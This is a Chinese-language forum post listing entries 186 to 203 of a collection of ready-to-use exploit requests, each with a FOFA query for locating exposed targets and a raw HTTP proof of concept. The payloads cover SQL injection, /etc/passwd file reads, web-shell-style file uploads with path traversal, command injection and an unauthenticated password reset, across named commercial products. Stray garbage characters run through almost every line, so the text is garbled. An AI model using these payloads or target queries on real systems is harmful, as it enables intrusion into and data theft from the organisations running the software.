7 W9 K2 t' T+ \. W0 B6 f1 x) S9 L
186. F-logic DataCube3 SQL注入3 u% T' j4 f/ q k. N* ~: q
CVE-2024-31750
0 o7 h* l: x9 f& `/ ]F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统. l0 D; ]5 s! k' ^
FOFA:title=="DataCube3"
% m4 f$ L% G5 v/ JPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1
/ x3 T7 X: W7 M8 \% dHost: your-ip6 g4 W W( j y- U6 E' Q2 ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.08 c% G$ N6 y4 J5 q7 A4 T; J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
- w# n, `' N1 {2 A4 K( ZAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) {; y! l3 l" Y5 j0 q8 @
Accept-Encoding: gzip, deflate
5 u7 i5 G1 T1 R" ^5 [Connection: close( A+ c! F9 B4 X* \. c' Y
Content-Type: application/x-www-form-urlencoded
4 G- c4 C3 K$ Q& z' x( e1 v5 d
$ u6 H. T( D0 e. p, [req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=14504 T6 @ H, ?3 P1 F- L, r: B
' \0 d: I2 }% L# D6 N
" ~( Q3 E! b- P' A) L0 H
187. Mura CMS processAsyncObject SQL注入: e ?- R9 w7 w0 @
CVE-2024-32640
7 Q l6 e+ C. a# [ }. J& f/ YFOFA:"Mura CMS"
; {8 w' o& [ w) ePOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.10 L9 W% r: Z- ^4 W% U- U9 n% L0 r
Host: your-ip/ F& c% g* Q+ E" u
Content-Type: application/x-www-form-urlencoded4 C# R6 C, P1 I( K( C
& J y5 g; c( @0 v1 e; d
& c) ?6 ]: c. O; F$ B3 Eobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1- E5 U" a1 k% T# N8 a
7 p/ U/ m5 [9 H/ s- g
/ A: ? V% ?/ }8 H: b R8 W P188. 叁体-佳会视频会议 attachment 任意文件读取
5 Y( t5 U# ]9 G7 Gversion <= 3.9.71 _: |1 R8 P: F
FOFA:body="/system/get_rtc_user_defined_info?site_id"
2 P9 z: |2 P8 e; ~! GGET /attachment?file=/etc/passwd HTTP/1.10 ~) w% D' e1 P) F3 r2 K
Host: your-ip
9 x$ y2 \7 m5 q1 V h% EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
; s4 N8 I% X6 W2 j' L, \; \- kAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# @( K. ^+ I: ?7 k4 z% zAccept-Encoding: gzip, deflate1 E; s3 ^# o" `; N
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8) x" Q% f( F7 T" R/ m1 P. I
Connection: close' {7 v# j q, T; h2 C
& O. U* H7 o4 B- X1 g' i
9 O. T* Q; h2 ?9 U! }' y
189. 蓝网科技临床浏览系统 deleteStudy SQL注入5 ^/ ]; C. {' F5 j: Y! E, O$ `
FOFA:app="LANWON-临床浏览系统"; m: E' ?$ e* f. V
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
9 {0 c' y4 A f3 s4 jHost: your-ip
. t9 f/ c6 j& [, v0 t: p$ [- p+ \User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36+ z# j$ |' H7 B0 u" E) }; r& v) M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( ]2 V2 v$ G9 C6 `6 h+ KAccept-Encoding: gzip, deflate5 l% U' I4 V! h: ?. U
Accept-Language: zh-CN,zh;q=0.9
4 ^% V" p. @9 j: X/ R" y( G6 RConnection: close
! m; e1 E6 h! F5 \' G. P, l" |4 k3 f- H
Y3 r/ |+ O/ \190. 短视频矩阵营销系统 poihuoqu 任意文件读取# s( Y8 d: w' o6 K/ r
FOFA:title=="短视频矩阵营销系统"
- I" E: r$ W% _9 y s2 M( DPOST /index.php/admin/Userinfo/poihuoqu HTTP/2
# x# l3 A" b6 P! f' x' M+ dHost: your-ip; T b- k; Y4 S, c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
9 `2 k& a5 |5 RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9# t# n/ C! P5 x+ l9 D
Content-Type: application/x-www-form-urlencoded
- ^6 o# `1 J. j4 z8 ^9 H. WAccept-Encoding: gzip, deflate& S3 E6 u3 r; m1 k) L, i; z( ?, B
Accept-Language: zh-CN,zh;q=0.9' h/ F+ l$ h7 k+ c
) }8 Z0 h% q( h) l @9 M& F( }
poi=file:///etc/passwd
* T, Z; k% w y7 I( o1 O z6 P, r, g
$ T2 j6 k4 v7 R: w ~1 p
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
" `( I# x1 I; P7 c8 uFOFA:body="/CDGServer3/index.jsp"
. m4 c( M! e$ V5 CPOST /CDGServer3/js/../NavigationAjax HTTP/1.1% N3 C6 D/ c+ k; n( c6 c
Host: your-ip
% m/ v' i# g v: X# O9 D3 \) w$ v$ EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
% X3 K4 s; m& mContent-Type: application/x-www-form-urlencoded, f0 ~, r, P; L/ G
: Y& f3 R9 A1 Q. h0 C _# P, P" I
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=& T) U* R, _1 @! ~' h0 E+ V$ Z2 B/ [
j8 l3 \% N' ^: Y) K2 N* z: j* ?
/ D$ V; \4 M- R0 S8 z5 V192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
% r( E$ [8 n9 p/ P2 uFOFA:title="用户登录_富通天下外贸ERP"* l* ^3 O+ n) p- v. ?1 f5 p/ M! s
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1- W3 o* V8 R$ A$ A( U }2 g
Host: your-ip
7 a' d# t2 B7 k- \* \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
( V- E1 k. D3 r6 I0 |Content-Type: application/x-www-form-urlencoded
( ~5 a1 K" ~0 m( q4 A& q
( \4 W( j K' S7 _$ \! ?% r6 m/ I7 z8 X
<% @ webhandler language="C#" class="AverageHandler" %>
$ {5 _/ ]* R4 ~, w4 B$ ^using System;
( t8 }! [2 ~* Z5 e/ F7 C- nusing System.Web;. o" B0 O' a! c+ u# b6 Z1 U: S
public class AverageHandler : IHttpHandler
9 ^! X3 j+ v8 E+ {{" L7 B% b2 V `: K% e8 X1 b0 X( K
public bool IsReusable8 ~* Q3 B4 T' ?0 [
{ get { return true; } }
8 }# ^& i5 {- F3 p. dpublic void ProcessRequest(HttpContext ctx)
2 K* [2 S7 Y6 M# [$ e{
6 o/ w0 u8 {7 Y( \7 b* d7 Dctx.Response.Write("test");# i/ ]8 Y% F( b+ ?) c
}
3 F& \, {/ [; z) k" x}
( ^) X( ?1 t8 b2 W% Q) M. U
/ G( h7 y: S% u) A
, q$ m6 _# P6 E0 L m193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
4 G' z- X1 @. B5 cFOFA:body="山石云鉴主机安全管理系统"
5 x7 @: b3 _9 h& XGET /master/ajaxActions/getTokenAction.php HTTP/1.1
) i$ V% K: q, g% L. t/ THost:9 m3 u1 w# [! r' i+ k6 j
Cookie: PHPSESSID=2333333333333;; t3 y; I Z- o0 l$ Z& \$ W
Content-Type: application/x-www-form-urlencoded+ z$ q- ^ Y0 _( g: K
User-Agent: Mozilla/5.0
: t2 m2 D, @0 t0 M5 Y( S- p# H4 N+ n
6 h" l9 D2 M' _8 Z
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1. W6 i- c" c8 I8 \
Host:
4 [: J! v1 c' @1 C! D! UUser-Agent: Mozilla/5.0% V- s+ {9 p' W3 Q8 d4 \& q. |5 o
Accept-Encoding: gzip, deflate
+ z4 f$ R9 r& N$ S9 LAccept: */*
# n1 c k& H* T9 nConnection: close( @' b$ ]* O6 K+ E, k. T+ ?
Cookie: PHPSESSID=2333333333333;1 @9 ^/ W9 g m
Content-Type: application/x-www-form-urlencoded; ~7 {/ F2 f4 q5 U. B& ^# T) q
Content-Length: 84
5 c7 h! O5 k% t0 s) Z! W e
, r. i" l9 s2 L' Y8 k( E0 ^% Pparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')2 q0 O- P6 U$ `5 @8 t( W% B4 g
: ]% @/ M9 E1 W2 \/ e. F7 h% n# b0 V6 t
GET /master/img/config HTTP/1.1
4 E p @* A! y' |! i- W4 R( i, _! ]Host:+ l% }$ j+ h, |
User-Agent: Mozilla/5.0
# j$ [0 u( n% _
8 K% b+ v7 F8 ~: E0 {+ s1 J5 e7 I0 d3 g" k1 P
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
- v5 t. b+ m, h7 K+ R' jFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在" R! q* @: {( m) z1 N; B# z
) ?+ a! v6 z9 nPOST /servlet/uploadAttachmentServlet HTTP/1.1
$ T1 r- ?* ]( |9 Y+ C% J0 f q. q* cHost: host9 F( p9 a* _" L( l0 h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
& Q) t2 V( B3 UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.80 q, Z4 c2 o' h. T v
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ G& x; W) V) d, T: o7 S2 s1 |
Accept-Encoding: gzip, deflate( S: S, ?8 O- P2 u& R
Connection: close. `; Z* U' X2 Z' N4 @1 j8 Z: o# |
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk/ Z# A; \7 h l' }0 W8 c
------WebKitFormBoundaryKNt0t4vBe8cX9rZk( i" x, \! {& Q- L% l) d, }1 G$ g
$ Q% v- X1 J! f: i( SContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"4 I2 I0 Y5 p# u" i A4 U
Content-Type: text/plain
5 I3 w2 Y' R, }! R<% out.println("hello");%>
3 ~, B- \* _! C6 P6 e* W5 Y------WebKitFormBoundaryKNt0t4vBe8cX9rZk( U; [0 H& m( c \! F0 u( t
Content-Disposition: form-data; name="json"* W- P- G0 f4 i9 O( a" S
{"iq":{"query":{"UpdateType":"mail"}}}
3 O: D7 i" R( J1 w. V( Y" b------WebKitFormBoundaryKNt0t4vBe8cX9rZk--/ P! e7 i% c. s' ]
3 }# C' n% u8 g- X9 v
( B: M, @% z2 `9 P0 @2 u: |; a8 w195. 飞鱼星上网行为管理系统 send_order.cgi命令执行$ p. Z* k2 O! J3 C( l) v; ~( B
FOFA:title=="飞鱼星企业级智能上网行为管理系统# e! X+ s* S6 K) T9 \( A
POST /send_order.cgi?parameter=operation HTTP/1.1
4 a- W/ e! p* G! g+ |/ WHost: 127.0.0.14 @: }" i$ m: O' S; `. H. q
Pragma: no-cache" h. x' ]6 m9 a/ I" c0 G
Cache-Control: no-cache
4 Q0 s0 }$ W2 l- I8 Q7 t" QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.360 a$ o' {( e! a7 V1 a
Accept: */*7 T, ?2 q. f) d7 S% p8 ^
Accept-Encoding: gzip, deflate
) {- D: c3 ^2 D' G' I2 f8 Z, yAccept-Language: zh-CN,zh;q=0.9
" W) |' I2 y0 F$ e' x- ~Connection: close! j; M% h/ h4 b+ k0 w" }5 ?% g+ z
Content-Type: application/x-www-form-urlencoded+ w7 }9 Y( [6 Y3 v+ }
Content-Length: 68& [; T% e! T2 P! R4 G: b v1 @
: o5 h" ^6 W6 W( B! i& u
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}) H* ]! ?+ V2 h. b8 h2 \% B0 E
+ y+ M+ H# k- u$ K' s
1 m8 V7 s' U& ~9 G+ H7 O- M2 W196. 河南省风速科技统一认证平台密码重置' p, \/ J9 y# f t( [
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
, n0 A( v! V3 L. DPOST /cas/userCtl/resetPasswordBySuper HTTP/1.1- }# o* N% N: p2 O& l# o) @; k" _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.368 \2 E+ |" q% N* Z6 D4 G( K
Content-Type: application/json;charset=UTF-8' e; t6 P D, v: p4 m8 K
X-Requested-With: XMLHttpRequest
8 T d7 H& }* J+ K- G8 E" [- LHost:
9 N5 y6 `1 e2 t" e6 zAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2% ~* @1 z4 C. C0 T; C* J( w" z
Content-Length: 45
7 |) n4 B$ }+ y8 Z) X! w- P7 qConnection: close( ?7 R, d) c/ l4 L; z# A& h+ r
! s: h/ a$ I& H0 S
{"xgh":"test","newPass":"test666","email":""}6 n2 E+ ~* s$ m4 W u
4 x3 K/ k) Z: C
- L0 a" m+ O/ S7 S
' G) `1 {! p) J197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入% C! X9 O2 W: H% n8 g' s
FOFA:app="浙大恩特客户资源管理系统") _) C/ P. V: o+ H" R" H
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
% u* h5 b0 Y, A! ]; M; hHost:# o3 h' ]$ B( |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36( _) y7 w! z: I! u
Accept-Encoding: gzip, deflate. w. m a, ]9 Y1 _9 S+ w* F- F* [2 d
Connection: close4 K8 k' `% t; C4 E: j
9 b2 g4 `# y/ A
% C2 C) x" `- ?: }" [0 h0 c& w; l9 ?- o
198. 阿里云盘 WebDAV 命令注入
) r. b6 Q" r1 a' y4 R: bCVE-2024-296409 w5 P! L2 u8 H6 h) q9 F
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.17 T, `$ {1 C+ P# v2 [, m/ q1 \8 H
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf644 e. W9 f! Z" L: ~
Accept: */*
2 X& c/ J4 J+ T* e5 G7 H: w4 n8 DAccept-Encoding: gzip, deflate
2 A# @% u) ?$ V5 KAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
l& m3 g3 h; ?. y5 RConnection: close, U6 j% h8 b1 j" p
7 o: ]8 G- Z( v& k, V( d/ l+ l
+ N$ t/ ]" \$ \3 Y
199. cockpit系统assetsmanager_upload接口 文件上传7 k- F7 k: ?, x6 G5 V+ T2 h
# t! D) W2 S8 t
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果: R& Z8 c) s5 N: m+ P* X4 r9 G6 F
GET /auth/login?to=/ HTTP/1.13 s" Q' O7 |1 k; q/ Z/ v
0 a2 U% _0 r$ L( {* n7 F响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
( x. ~" k6 z; N* q
* D9 q: f. [" z; Z/ M, x+ C2.使用刚才上一步获取到的jwt获取cookie:; q" Q3 G. l' ]
' L2 ^. i H( G/ K1 C
POST /auth/check HTTP/1.1
6 H- n$ H' z& z* P+ ^7 ]Content-Type: application/json+ w- d, ~# S6 ?, O5 k; y
0 K& g; e+ e# R' E% q
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}- n4 p* s7 e. w& H% G2 t4 J
; Y2 U5 ^1 v/ f& Z+ u响应:200,返回值:% l5 y" o2 w1 s: X
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/. u$ @5 X' U1 M' O
Fofa:title="Authenticate Please!". r+ e/ W! o# t) _; a1 q' ^' Z4 i
POST /assetsmanager/upload HTTP/1.13 c2 A+ a u, l! O& N0 P: W% g" P
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb34 P) ?6 ?) {# K1 a2 K2 w9 [: z
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92
5 H! o- J- q1 t, M% D0 M" o, @* G) B. S, d" ~7 o- \! @
-----------------------------36D28FBc36bd6feE7Fb3
$ x( w: D8 @6 A6 T. z3 nContent-Disposition: form-data; name="files[]"; filename="tttt.php"+ i8 r* @, G+ p) g
Content-Type: text/php
- \! @0 d' ]' G) p w
7 M1 t* X1 K/ z/ _<?php echo "tttt";unlink(__FILE__);?>
8 f2 F5 b/ V2 w- n0 m$ @% B) Z6 P-----------------------------36D28FBc36bd6feE7Fb33 Z, J: ^/ Q8 A( q0 n; L4 j$ l
Content-Disposition: form-data; name="folder"$ k9 {) }. F7 Z8 K9 k- g8 x" y
. u: B& S" A! v5 U
-----------------------------36D28FBc36bd6feE7Fb3--
* [ L4 u" n d. ^1 u5 [7 U' k! k, u+ K
- Y+ [0 ^/ h0 _7 x1 v/ x
/storage/uploads/tttt.php+ j2 X$ T- a" ^- b* h
! h' i3 E: y, V( T" W5 l. _) ]2 I4 ~200. SeaCMS海洋影视管理系统dmku SQL注入
+ ~) \" `9 l2 g$ f2 }FOFA:app="海洋CMS"+ l) ]/ P8 Z3 F+ f2 `4 O5 R1 d9 w% \
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
2 G8 v/ ^; k m. a u: WCookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
( H4 ]! r, w+ Z, LUpgrade-Insecure-Requests: 1
+ p5 G m! c; T- U3 G; J8 bCache-Control: max-age=0
' O" A* W) o3 b* S: I+ K7 LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! `" C0 B; _* y5 b, v/ [Accept-Encoding: gzip, deflate6 l1 Z5 C+ g% F' y+ v! ~8 V: h
Accept-Language: zh-CN,zh;q=0.9
. ~" j4 [0 U6 f5 C9 y7 |
3 A! k# `* }8 X( Z1 l3 e n$ T! m7 O& J" Q) x
201. 方正全媒体新闻采编系统 binary SQL注入* s' _# w3 L" d7 ]: {1 O6 [
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
) K1 Z: f; r, \POST /newsedit/newsplan/task/binary.do HTTP/1.1
: w. a! v+ P7 a; j- e% \' E" v7 ?Content-Type: application/x-www-form-urlencoded" ~% Y% \; @! a% |- D$ r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) F% W9 Z* C* t2 Q2 |7 W& P) R# t: |
Accept-Encoding: gzip, deflate0 R! s5 @# `( b$ b% Z* E
Accept-Language: zh-CN,zh;q=0.9) G% v5 | M8 }+ d/ Y
Connection: close
1 Q3 r5 E) f4 P; a
1 J3 W( U" S$ w6 c- M' QTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
h9 a, p) V9 e5 f( Z# w3 W; _6 M, H. \( {& \8 l" a7 l. i
% \, i( i! `- i
202. 微擎系统 AccountEdit任意文件上传5 y; o/ b# p6 E/ L w
FOFA:body="/Widgets/WidgetCollection/"
" Y$ c- k0 u+ T+ D8 x; p }获取__VIEWSTATE和__EVENTVALIDATION值) c* \6 ?' f: B: i
GET /User/AccountEdit.aspx HTTP/1.1( `, T) f5 J' K' U$ q6 H6 A6 j1 r
Host: 滑板人之家: g2 ]( }8 j0 ?) }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.319 z5 C1 x8 ?. M( P# R9 ~/ u2 t% x% c& r
Content-Length: 0
' O- B2 s- y" |: D" M) E [5 f- q6 P, F! @) e3 P
" x: p3 J; c9 l' m$ A4 Y2 `' y8 k
替换__VIEWSTATE和__EVENTVALIDATION值0 ?* r: B/ K/ J6 y1 m
POST /User/AccountEdit.aspx HTTP/1.1
) r! T4 z; E' AAccept-Encoding: gzip, deflate, br% w$ P9 @8 [( d Q( d
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
' [( h; Q6 F8 x3 M! i3 w! i0 N3 B8 E9 l
-----------------------------786435874t38587593865736587346567358735687( r( I, u, ?( E3 J" m8 H) o
Content-Disposition: form-data; name="__VIEWSTATE"( G' e# g5 r7 s# f" V
8 ~/ I Q, L$ Y, x7 u2 x__VIEWSTATE
* v, b& X4 A2 r! Z' I8 r! W-----------------------------786435874t38587593865736587346567358735687/ C: J) H) M4 W6 R3 X% ~
Content-Disposition: form-data; name="__EVENTVALIDATION" u' p# u) b% C0 y, x
# B/ e$ W Y8 @8 o7 ?4 E% I/ D
__EVENTVALIDATION) b7 W: ^( y+ F. k5 B) i" L: j
-----------------------------786435874t385875938657365873465673587356871 M' L" G( N" n9 w
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"0 d% _2 ?! b, ^# i8 _
Content-Type: text/plain( D6 H! Z1 u3 l: u. \
c- R5 O7 u I, v, B. k
Hello World!
( j; _* N$ M+ p, {-----------------------------786435874t38587593865736587346567358735687( \7 r4 h, j0 w; b: X1 ~6 K- k
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"3 u0 f1 n1 _" _
( Z9 P- A7 [" H" M7 S) T
上传图片: [1 o1 W9 @1 x& R) W5 B
-----------------------------786435874t38587593865736587346567358735687, H* t) E* i. F
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"% j8 J8 E' w0 F0 e7 t
4 Y, I0 z& P6 ?, A, G3 P. m+ R c
" Z2 p; M! y/ x) _. c-----------------------------786435874t38587593865736587346567358735687' @+ T6 U$ P. L" B( [- R' O7 x
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
% @0 m6 E- W$ W+ O' M' \( J' j1 _. o5 E4 H3 m
& ^# _1 v' N* [3 G4 A-----------------------------786435874t38587593865736587346567358735687--/ A1 ]! r8 W, k3 S$ O( x
1 _& G) A8 }- |5 R0 S# J
$ F9 B# z& S2 r% @- @8 _2 ^" j/_data/Uploads/1123.txt
; u5 n. L, `$ y- D0 w7 x5 o! R( ]- q# x; b2 V, R8 I/ m; F
203. 红海云EHR PtFjk 文件上传) M+ L' f5 S) c. s# \* |
FOFA:body="RedseaPlatform"# E+ [9 ]& N' U/ C( g+ V# s. s" Y1 ~
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1* T* ]4 ~* c$ n. `& C9 f/ n
Host: x.x.x.x( f7 H# P6 \: C2 Z6 L9 Y# ~( Q9 }
Accept-Encoding: gzip
- \5 I$ R& C" c2 b4 f7 A3 PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
' e D1 \- n, E. o0 i1 |Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4; Z2 p, I( ^7 H1 I S* w6 r
Content-Length: 210) W# B9 _+ v/ s* t$ H3 y* F
* J& D* ~ R& N' ^/ Q8 W
------WebKitFormBoundaryt7WbDl1tXogoZys4
& |, k1 b6 K9 ]% B( TContent-Disposition: form-data; name="fj_file"; filename="11.jsp": y$ @' b* F$ O I
Content-Type:image/jpeg
" f2 n* L& g7 I. T! W9 ^
8 R) j' _3 }# P P+ _<% out.print("hello,eHR");%>( D/ K. R; K C9 B$ F! Z
------WebKitFormBoundaryt7WbDl1tXogoZys4--) U1 j) R5 z0 l' V
* T% m/ G, K. X8 H
1 E0 ~) l6 c) T6 {; x q! S+ m! y' }' j V- a) M
6 n0 n7 s8 `4 A# ?' {- p5 t
# Z+ \9 C" J, Z
$ `% t8 T* X7 j0 |6 T3 y |
发表于 2024-6-5 14:31:29
收藏
支持
反对